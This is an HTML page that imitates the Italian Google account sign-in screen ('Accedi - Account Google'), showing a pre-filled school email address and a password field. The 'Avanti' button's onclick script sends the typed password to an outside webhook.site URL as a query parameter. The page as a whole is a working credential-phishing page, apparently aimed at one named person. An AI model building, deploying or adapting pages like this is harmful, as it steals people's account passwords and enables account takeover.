<!DOCTYPE html>
<html lang="it">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300..800;1,300..800&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./font-awesome/css/fontawesome.min.css">
    <title>Accedi - Account Google</title>
    <style>
        body {
            font-family: "Open Sans", roboto, "Noto Sans Myanmar UI", arial, sans-serif;
            background-color: #ffff;
            justify-content: center;
            align-items: center;
            margin: 0;
            margin: 0;
            position: absolute;
            top: 45%;
            -ms-transform: translateY(-50%);
            transform: translateY(-50%);
            margin-left: 20px;
            margin-right: 20px;
        }
        .logo {
            width: 40px;
            padding: 10px;
        }
        h1 {
            font-size: 44px;
            margin-top: 10px;
            margin-bottom: 10px;
            font-weight: 500;
        }
        input[type="password"], input[type="text"] {
            width: 100%;
            padding: 15px;
            margin: 10px 0;
            box-sizing: border-box;
            border: 1px solid #000;
            border-radius: 4px;
        }

        a {
            color: #0b57d0;
            text-decoration: none;
            font-weight: 500;

        }
        .button {
            background-color: #0b57d0;
            color: white;
            padding: 10px;
            border: none;
            border-radius: 20px;
            cursor: pointer;
            width: 15%;
            margin-left: 40%;
        }
        p{
            font-size: small;
            color: #444746;
        }
        .mail{
            border: 1px solid #444746;
            width:fit-content;
            padding: 8px;
            border-radius: 15px;
            font-weight: bold;
        }
    </style>
</head>
<body>
            <img src="https://unifysolutions.net/supportedproduct/google-signin/Google__G__Logo.svg" alt="Google Logo" class="logo">
            <br>
            <h1>Ciao</h1>
            <br>
            <p class="mail"> <img src="https://icons.veryicon.com/png/o/miscellaneous/font-awesome-2/user-circle-o-2.png" style="width: 15px; position: relative; margin-left: -5px; margin-right: 5px; margin-top: 2px;">filippo.raule@liceoariosto.it</p>
            <br>
            <input type="password" placeholder="password" id="input">
            <a href="#" style="font-size: 80%;">Password dimenticata?</a>            <button class="button" onclick="window.location.replace('https://webhook.site/05a6e1cb-eacc-495a-80af-a05afff53f6d?password='+document.getElementById('input').value)">Avanti</button>
</body>
</html>
